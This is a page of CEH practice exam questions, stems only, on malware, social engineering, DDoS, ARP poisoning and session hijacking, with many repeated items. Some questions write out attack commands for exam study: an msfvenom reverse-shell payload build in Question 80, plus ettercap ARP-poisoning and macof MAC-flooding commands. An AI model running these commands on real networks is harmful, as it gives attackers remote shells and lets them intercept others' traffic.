Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

← Malware, Social Engineering and Network Attacks practice sets

CEH Malware, Social Engineering and Network Attacks • Complete Question Bank

CEH Malware, Social Engineering and Network Attacks — All Questions With Answers

Complete CEH Malware, Social Engineering and Network Attacks question bank — all 0 questions with answers and detailed explanations.

216
Questions
Free
No signup
Certifications/CEH/Practice Test/Malware, Social Engineering and Network Attacks/All Questions
Question 1mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst notices a high volume of ICMP Echo Reply packets on the network. The source IPs are varied, but the destination IP is the same. Which type of attack is MOST likely occurring?

Question 2easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A user receives a phone call from someone claiming to be from IT support, asking for their password to troubleshoot an issue. Which social engineering technique is being used?

Question 3mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which tool would a penetration tester MOST likely use to perform ARP poisoning and conduct a man-in-the-middle attack on a local network?

Question 4hardmultiple choice
Read the full NAT/PAT explanation →

An analyst observes the following output from Wireshark: a TCP packet with the SYN flag set, followed by a SYN-ACK, then an ACK, and then a RST. The sequence numbers show a pattern: initial seq=100, ack=300, then seq=300, ack=101. What is the MOST likely interpretation?

Question 5mediummultiple choice
Read the full NAT/PAT explanation →

A security team discovers a file named 'svchost.exe' in a user's Temp folder. The file is signed by 'Microsoft Corporation' but the digital signature validation fails. Which analysis method should be used FIRST to determine if it's malicious?

Question 6mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An organization is experiencing repeated DDoS attacks that consume all available bandwidth. Which mitigation technique is MOST effective for handling such volumetric attacks?

Question 7easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which type of malware is characterized by self-replication and spreading across networks without needing a host file?

Question 8mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A penetration tester uses the Social Engineering Toolkit (SET) to create a malicious USB drive that autoruns when inserted. Which social engineering technique is being employed?

Question 9hardmultiple choice
Read the full DNS explanation →

An IDS alerts on a large number of outbound DNS queries from an internal host to a suspicious domain. The queries have random subdomains and the response size is large. Which attack is MOST likely in progress?

Question 10easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which type of malware encrypts the victim's files and demands payment for the decryption key?

Question 11mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A network administrator notices that the switch's CAM table is full, causing the switch to flood all incoming traffic out of all ports. Which attack is MOST likely occurring?

Question 12hardmultiple choice
Read the full NAT/PAT explanation →

During a penetration test, you capture the following output: 'HTTP/1.1 200 OK ... Set-Cookie: sessionid=abc123; path=/'. You then send a request with a modified cookie value 'sessionid=abc124' and receive a valid session. Which type of vulnerability has been exploited?

Question 13mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are characteristics of a polymorphic virus? (Select 2)

Question 14hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are effective DDoS mitigation techniques? (Select 3)

Question 15mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

Question 16mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst receives an alert indicating that a host on the internal network is sending a high volume of ICMP echo requests to multiple external IP addresses. The analyst notices that the source IP address is spoofed. Which type of attack is MOST likely occurring?

Question 17easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which of the following tools is specifically designed for ARP poisoning and can be used to perform man-in-the-middle attacks on a local network?

Question 18hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A system administrator notices unusual outbound traffic from a server on port 4444. The server has no legitimate service listening on that port. A malware analyst runs 'strings' on a suspicious binary and finds a reference to 'cmd.exe /c' and an IP address. What type of malware is MOST likely present?

Question 19mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An organization wants to test its employees' susceptibility to social engineering by sending fake emails that appear to come from the IT department, requesting password resets. Which tool would be MOST effective for conducting this test?

Question 20mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security team observes that a switch's MAC address table is full, and the switch has started flooding unicast traffic to all ports. Which attack has MOST likely been performed?

Question 21easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which type of malware spreads by replicating itself across a network without requiring a host file to attach to?

Question 22mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An analyst uses the following command to capture traffic: tcpdump -i eth0 -w capture.pcap host 10.0.0.5 and port 80. After generating traffic from a web server at 10.0.0.5, the analyst examines the pcap with Wireshark. What type of traffic will appear in the capture?

Question 23hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst detects a file named 'invoice.pdf.exe' in an email attachment. When the file is submitted to VirusTotal, multiple engines detect it as a Trojan. The analyst wants to perform dynamic analysis to observe its behavior. Which approach is BEST?

Question 24easymultiple choice
Read the full NAT/PAT explanation →

Which type of social engineering attack involves a malicious actor impersonating a legitimate organization in a voicemail message to trick the victim into revealing sensitive information?

Question 25mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A penetration tester is performing a session hijacking attack. After capturing packets, the tester successfully predicts the TCP sequence numbers and injects packets to take over the session. Which type of attack is this?

Question 26hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security engineer is configuring DDoS protection for a web server. The goal is to mitigate a Slowloris attack. Which mitigation technique is MOST effective?

Question 27mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An employee receives an email that appears to be from the CEO, requesting an urgent wire transfer. The email address is slightly misspelled (e.g., ceo@cornpany.com instead of ceo@company.com). This is an example of which type of attack?

Question 28mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

Question 29hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are techniques used in static malware analysis? (Select 3)

Question 30mediummulti select
Read the full DNS explanation →

Which TWO of the following are common indicators of a DNS spoofing attack? (Select 2)

Question 31mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst discovers a user downloaded a file that, when executed, creates a hidden process that connects to a remote server and allows full remote control of the system. Which type of malware BEST describes this behavior?

Question 32easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A penetration tester receives an email that appears to be from the company's CEO, urgently requesting that the tester click a link to review a document. The email contains several grammatical errors and the sender's address is slightly misspelled. Which type of social engineering attack is this MOST likely?

Question 33hardmultiple choice
Read the full DNS explanation →

An organization's security team observes a surge in outgoing DNS queries to external servers from a single internal host, with each query returning unusually large responses (e.g., 4000 bytes). The host is not configured as a DNS resolver. Which attack is MOST likely occurring?

Question 34mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst is investigating a suspicious file and wants to quickly determine whether it is known malware without executing it. Which approach should the analyst use FIRST?

Question 35mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A network administrator notices that the ARP cache on several workstations contains entries mapping the default gateway IP to an unknown MAC address. Users report intermittent connectivity issues. Which tool is MOST likely being used to perform this attack?

Question 36easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which of the following malware types is characterized by self-replication without requiring a host file or program, and spreading across networks automatically?

Question 37hardmultiple choice
Review the full subnetting walkthrough →

During a penetration test, you execute a command that sends a large number of spoofed ICMP echo request packets to a subnet's broadcast address. This results in a flood of replies to the target system. Which attack have you performed?

Question 38mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst notices that a web server is experiencing slow response times, and the connection logs show many incomplete HTTP requests from various IP addresses, each keeping connections open for long periods. Which attack is MOST likely occurring?

Question 39mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A company's security team wants to deploy a DDoS mitigation technique that distributes incoming traffic across multiple servers in different geographic locations, making it harder for an attacker to overwhelm a single target. Which technique BEST fits this description?

Question 40easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which of the following is a tool commonly used for MAC flooding attacks to force a switch into fail-open mode, allowing sniffing of all traffic on the network?

Question 41hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A penetration tester uses the following command to scan a target: nmap -sU -sV -p 53,161,162 10.0.0.1. Which of the following BEST describes what this scan will accomplish?

Question 42mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An attacker calls a company's help desk, pretending to be a new employee who forgot his username and password. The attacker provides some employee details gleaned from social media and convinces the help desk to reset the password. Which social engineering technique is being used?

Question 43mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO types of malware typically require user interaction (e.g., opening a file or clicking a link) to activate? (Select two.)

Question 44hardmulti select
Read the full DNS explanation →

Which THREE of the following are characteristics of a DNS amplification DDoS attack? (Select three.)

Question 45mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are examples of static malware analysis techniques? (Select two.)

Question 46easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst notices repeated failed login attempts from a single external IP address targeting the company's webmail portal. The attempts use common usernames like 'admin', 'user', and 'test'. Which type of social engineering attack is MOST likely being attempted?

Question 47mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

During a penetration test, a security analyst runs the following command on a Linux system: ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//. What is the PRIMARY purpose of this command?

Question 48hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An incident response team discovers a suspicious executable on a compromised workstation. They want to analyze the malware without executing it. Which of the following techniques would be MOST appropriate for this initial analysis?

Question 49mediummultiple choice
Read the full DNS explanation →

A security analyst observes a sudden surge in incoming UDP traffic to the company's DNS servers from multiple external IP addresses. The packets appear to be DNS queries with spoofed source IPs. Which type of DDoS attack is MOST likely occurring?

Question 50easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which of the following is a type of malware that spreads by replicating itself across a network without requiring a host file?

Question 51mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A penetration tester uses a tool to perform ARP poisoning and then launches a man-in-the-middle attack. The tool also allows session hijacking and sniffing. Which of the following tools is being used?

Question 52mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An employee receives an email that appears to be from the company's CEO, requesting an urgent wire transfer to a vendor. The email address is slightly different from the CEO's actual address. Which type of social engineering attack is this?

Question 53hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst is analyzing a suspicious file and runs the command 'strings malware.exe | grep -i http'. The output shows several URLs ending with '.exe'. What does this indicate?

Question 54mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which of the following tools is specifically designed to perform MAC flooding to force a switch into fail-open mode, allowing packet sniffing?

Question 55easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A user reports that their computer is infected with ransomware. Which of the following is the BEST immediate action for the security team to take?

Question 56mediummultiple choice
Read the full NAT/PAT explanation →

Which type of malware is characterized by modifying its own code to evade signature-based detection, often changing its appearance each time it replicates?

Question 57hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A network administrator notices an unusual amount of traffic on port 389 from an internal server to multiple external IP addresses. Which type of malware might be present?

Question 58mediummulti select
Read the full DNS explanation →

Which TWO of the following are characteristics of a DNS amplification attack? (Select 2)

Question 59hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are examples of application-layer DDoS attacks? (Select 3)

Question 60mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are valid techniques for session hijacking? (Select 2)

Question 61easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst discovers a file named invoice.exe in an email attachment. Static analysis with PEiD indicates the file is packed with UPX. What is the BEST next step in analyzing this malware?

Question 62mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A network administrator notices an unusually high number of half-open TCP connections to the company's web server. The source IPs are spoofed. Which type of attack is MOST likely occurring?

Question 63hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

During a penetration test, an analyst uses a tool that sends forged ARP replies to associate the attacker's MAC address with the IP address of the default gateway. This technique allows the attacker to intercept traffic. Which tool is commonly used for this purpose?

Question 64mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst receives an alert about a workstation repeatedly sending large volumes of ICMP echo request packets to a broadcast address. Which type of attack is this indicative of?

Question 65mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A user receives a phone call from someone claiming to be from IT support, asking for their password to perform a system update. This is an example of which social engineering technique?

Question 66hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A forensic analyst examines a system infected with malware that displays ransomware notes and encrypts files. The analyst uses a sandbox to observe behavior. During analysis, the malware contacts a C2 server and downloads additional payloads. Which type of malware analysis is being performed?

Question 67easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which type of malware is designed to replicate itself across networks without requiring a host file, often exploiting vulnerabilities to spread?

Question 68mediummultiple choice
Read the full DNS explanation →

An organization wants to protect against DNS spoofing attacks. Which security measure is MOST effective in preventing an attacker from poisoning DNS cache entries?

Question 69hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security team suspects a session hijacking attack. The analyst examines network traffic and sees packets with sequence numbers that increment by predictable values. Which attack is MOST likely occurring?

Question 70easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which tool is specifically designed to create and manage phishing campaigns for security awareness testing?

Question 71mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A network switch starts behaving like a hub, broadcasting all traffic to all ports. The security team suspects an attack that floods the switch with fake MAC addresses. Which attack is this?

Question 72mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which DoS attack exploits the HTTP protocol by sending partial HTTP requests to keep connections open, exhausting server resources?

Question 73mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are characteristics of a polymorphic virus? (Select 2)

Question 74hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are effective DDoS mitigation techniques? (Select 3)

Question 75easymulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are types of malware analysis? (Select 2)

Question 76easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst observes repeated failed login attempts from a single IP address targeting multiple user accounts. Which type of social engineering attack is being attempted?

Question 77mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst runs the command 'tcpdump -i eth0 -n host 10.0.0.5 and port 80' and sees many packets with the SYN flag set but no corresponding ACK. Which attack is likely occurring?

Question 78mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

During a penetration test, you discover a process named 'svch0st.exe' running on a Windows server with high CPU usage. The file is not digitally signed. Which type of malware is MOST likely present?

Question 79easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An attacker sends an email that appears to come from the CEO, requesting that the recipient urgently transfer funds to a specified account. Which type of social engineering attack is this?

Question 80hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst executes the command 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe' and transfers the file to a target. Which technique is being used?

Question 81mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

After a security incident, an analyst retrieves a suspicious file. The analyst runs the 'strings' command on it and sees references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique does this indicate?

Question 82easymultiple choice
Read the full DNS explanation →

An organization experiences a DDoS attack where a large volume of DNS queries with spoofed source IPs are sent to open DNS resolvers, which then amplify the traffic to the victim. Which type of attack is this?

Question 83hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

During a penetration test, you run the command: 'macof -i eth0 -s 192.168.1.1 -d 192.168.2.1 -e 00:11:22:33:44:55'. What is the intended effect of this command?

Question 84mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An analyst is analyzing a suspicious file using VirusTotal and observes that only 3 out of 60 antivirus engines detect it as malicious. The file has been submitted before but with no detections. What should the analyst conclude?

Question 85mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst notices that the ARP cache on a workstation contains multiple entries for the same IP address with different MAC addresses. Which attack is likely occurring?

Question 86hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An attacker wants to perform a man-in-the-middle attack on a local network. Which two tools from the following list would be most effective? (Select the best answer from the options below; note: this is a multiple choice, not multi-select) A) Wireshark B) Ettercap C) Nmap D) Metasploit E) Aircrack-ng

Question 87easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

Question 88mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are effective mitigation techniques against DDoS attacks? (Select two)

Question 89hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are indicators that a system may be infected with a backdoor Trojan? (Select three)

Question 90mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are examples of social engineering attacks? (Select two)

Question 91mediummultiple choice
Read the full DNS explanation →

A security analyst notices an unusual spike in outbound traffic on UDP port 53 from a single internal host. The host is not a DNS server. Which type of malware is MOST likely responsible?

Question 92easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which tool would an ethical hacker use to automatically generate a malicious USB drive that, when plugged in, executes a payload and connects back to the attacker?

Question 93mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

During a penetration test, a security analyst captures network traffic and observes a series of ARP replies without corresponding ARP requests. An internal host's IP address is suddenly associated with two different MAC addresses. Which attack is MOST likely occurring?

Question 94hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A penetration tester wants to perform a stealth scan without completing the TCP three-way handshake. The target is a web server on port 80. The tester uses Nmap with the -sS flag. What is the expected behavior if the port is open?

Question 95easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

Question 96mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst reviews logs and notices that an attacker crafted a packet with a source IP address matching the target's IP address, and sent it to a network's broadcast address. Which type of attack does this describe?

Question 97mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which of the following is a characteristic of a polymorphic virus?

Question 98hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An organization experiences a DDoS attack where the attacker sends many incomplete HTTP requests that keep connections open, exhausting the server's connection pool. Which attack technique is being used?

Question 99mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

During a social engineering engagement, an attacker calls an employee pretending to be from IT support and asks for their password to perform a system update. Which social engineering technique is being employed?

Question 100easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which type of malware is characterized by its ability to spread without requiring a host file and can replicate across networks automatically?

Question 101mediummultiple choice
Read the full DNS explanation →

A company wants to defend against DNS amplification attacks. Which mitigation technique would be MOST effective?

Question 102hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An ethical hacker is analyzing a suspicious file using static analysis. Which of the following actions is part of static malware analysis?

Question 103mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are examples of application-layer DDoS attacks? (Choose two.)

Question 104hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are common indicators of a man-in-the-middle attack using ARP spoofing? (Choose three.)

Question 105mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are techniques used in session hijacking attacks? (Choose two.)

Question 106mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst observes a gradual increase in network traffic from an internal host to an external IP address on port 443, with the host also connecting to a known command-and-control (C2) domain. Which type of malware is MOST likely responsible?

Question 107easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which of the following tools is commonly used for dynamic malware analysis by executing the malware in an isolated environment and monitoring system changes?

Question 108mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An organization receives an email that appears to be from the CEO, urgently requesting that the recipient wire funds to a new vendor. The email contains the CEO's name and title but the sender address is slightly misspelled. Which type of social engineering attack is this?

Question 109hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst detects an ongoing DDoS attack where the attacker sends a large number of ICMP echo request packets with spoofed source IP addresses to a network's broadcast address. The attack overwhelms the target with responses from all hosts on the network. Which attack type is this?

Question 110mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which tool can be used to perform ARP poisoning to intercept traffic between a victim and the default gateway?

Question 111easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A user reports that their system has become very slow and numerous pop-up ads appear even when browsing is not active. Which type of malware is MOST likely installed?

Question 112hardmultiple choice
Read the full NAT/PAT explanation →

An analyst captures network traffic and sees a large number of packets with source IP 10.0.0.1, destination IP 192.168.1.1, TCP SYN flag set, with sequence numbers that appear incremental. The destination responds with SYN-ACK but the source never completes the handshake. Which attack is MOST likely occurring?

Question 113mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which of the following is a form of social engineering where an attacker physically follows an authorized person into a restricted area without proper authentication?

Question 114mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An attacker uses the Social Engineering Toolkit (SET) to clone a legitimate website and send a malicious link to employees. When an employee clicks the link, they are prompted to enter their credentials. Which attack is this?

Question 115hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A penetration tester runs the following command: `macof -i eth0 -s 192.168.1.100 -d 10.0.0.1`. Which attack is being performed?

Question 116easymultiple choice
Read the full NAT/PAT explanation →

Which type of malware is characterized by being able to change its code signature each time it replicates to evade signature-based detection?

Question 117mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An organization wants to mitigate the impact of a DDoS attack by distributing incoming traffic across multiple servers in different geographic locations. Which technique is BEST suited?

Question 118mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

Question 119hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are static malware analysis techniques? (Select 3)

Question 120easymulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are examples of session hijacking attacks? (Select 2)

Question 121easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst receives an email that appears to be from the CEO, urgently requesting a wire transfer. The email address is slightly misspelled (ceo@cornpany.com instead of ceo@company.com). Which type of social engineering attack is this?

Question 122mediummultiple choice
Review the full subnetting walkthrough →

During a penetration test, a tester uses a tool to perform ARP spoofing to intercept traffic between two hosts on the same subnet. Which tool is most commonly associated with this technique?

Question 123hardmultiple choice
Study the full Python automation breakdown →

A security analyst runs the following command: 'python macof -i eth0 -n 1000'. Shortly after, the switch begins flooding traffic to all ports. What is the analyst trying to achieve?

Question 124mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A user reports that their system has become sluggish and they see pop-up advertisements even when no browser is open. Additionally, unknown processes are running in Task Manager. Which type of malware is most likely responsible?

Question 125mediummultiple choice
Read the full DNS explanation →

A security team detects a large number of UDP packets from multiple sources directed at a single server's DNS port (53). The packets appear to have a spoofed source IP of the target. Which type of DDoS attack is being observed?

Question 126hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

After a security incident, an analyst retrieves a suspicious file. To determine if it is malicious without executing it, the analyst runs the 'strings' command and uploads the file to VirusTotal. Which type of malware analysis is being performed?

Question 127mediummultiple choice
Read the full NAT/PAT explanation →

A penetration tester successfully predicts the TCP sequence numbers of a target and sends crafted packets to impersonate a trusted host. Which type of attack is this?

Question 128easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which of the following is a type of malware that replicates itself by attaching to executable files and requires human action to spread, such as opening an infected attachment?

Question 129mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst notices that a web server is responding very slowly to legitimate requests. The server logs show many incomplete HTTP GET requests that never complete, each opened slowly over time from many different IP addresses. Which attack is most likely occurring?

Question 130hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An attacker gains physical access to a building by following an authorized employee through a secure door without using a badge. Which social engineering technique is being used?

Question 131mediummultiple choice
Read the full DNS explanation →

Which tool is commonly used to perform DNS spoofing on a local network by intercepting DNS requests and replying with forged responses?

Question 132easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A system administrator receives a phone call from someone claiming to be from IT support, asking for the administrator's password to 'fix a server issue'. This is an example of which social engineering attack?

Question 133mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are characteristics of a polymorphic virus?

Question 134hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are effective DDoS mitigation techniques?

Question 135mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are examples of application-layer DDoS attacks?

Question 136easymultiple choice
Read the full DNS explanation →

A security analyst notices that an internal server is sending a high volume of DNS queries to external servers for non-existent domains. Which type of malware behavior is MOST likely being observed?

Question 137mediummultiple choice
Read the full NAT/PAT explanation →

During a social engineering assessment, an attacker calls a help desk impersonating a new employee and requests a password reset due to a 'locked account'. The help desk complies. Which social engineering technique is being used?

Question 138mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst runs 'strings malware.exe' and finds several URLs and IP addresses. The analyst then uploads the file to VirusTotal and gets a detection ratio of 5/70. What type of analysis has been performed?

Question 139hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An analyst observes that a web server is receiving many HTTP GET requests with random parameter values, each request taking a long time to complete. The server's connection pool is exhausted, and legitimate users cannot access the site. Which attack is MOST likely occurring?

Question 140easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which tool is specifically designed to automate social engineering attacks, such as phishing and credential harvesting?

Question 141mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A network administrator receives an alert that the switch's CAM table is full, causing the switch to flood frames out all ports. Which attack has likely occurred?

Question 142hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst captures network traffic and sees a sequence of ARP replies with the same IP address mapping to different MAC addresses within a short period. Which attack is indicated?

Question 143easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An attacker sends an email to the CEO of a company, pretending to be a board member and requesting a wire transfer for a confidential acquisition. Which social engineering attack is this?

Question 144mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst uses a tool to capture packets in promiscuous mode on a network segment. The analyst notices that only traffic to and from the analyst's machine is captured, not all traffic on the segment. What is the most likely reason?

Question 145mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which of the following is the BEST defense against a TCP SYN flood attack?

Question 146hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A penetration tester uses a tool to spoof ARP replies, redirecting traffic through the tester's machine. The tester then captures credentials from the redirected traffic. Which tool is BEST suited for this task?

Question 147easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An employee receives an SMS message that claims to be from the IT department, asking the employee to click a link to verify their email account. Which social engineering attack is this?

Question 148mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are characteristics of a polymorphic virus? (Choose two.)

Question 149mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are examples of protocol-based DoS attacks? (Choose two.)

Question 150hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are effective techniques to prevent ARP poisoning attacks? (Choose three.)

Question 151mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst notices a significant increase in outbound traffic from an internal server to multiple external IPs on port 443. The server is not a web server and should not be initiating such connections. Which type of malware is MOST likely causing this behavior?

Question 152easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which tool is commonly used for ARP spoofing attacks to perform man-in-the-middle (MITM) attacks on a local network?

Question 153hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An attacker uses the Social Engineering Toolkit (SET) to craft a phishing email that appears to come from the company's CEO, requesting the recipient to urgently wire funds to a new vendor. This attack is BEST described as which type of social engineering?

Question 154mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

During a penetration test, a tester captures network traffic and notices a large number of ARP replies claiming that 192.168.1.1 is at MAC address 00:11:22:33:44:55, which is different from the legitimate gateway MAC. Which attack is likely in progress?

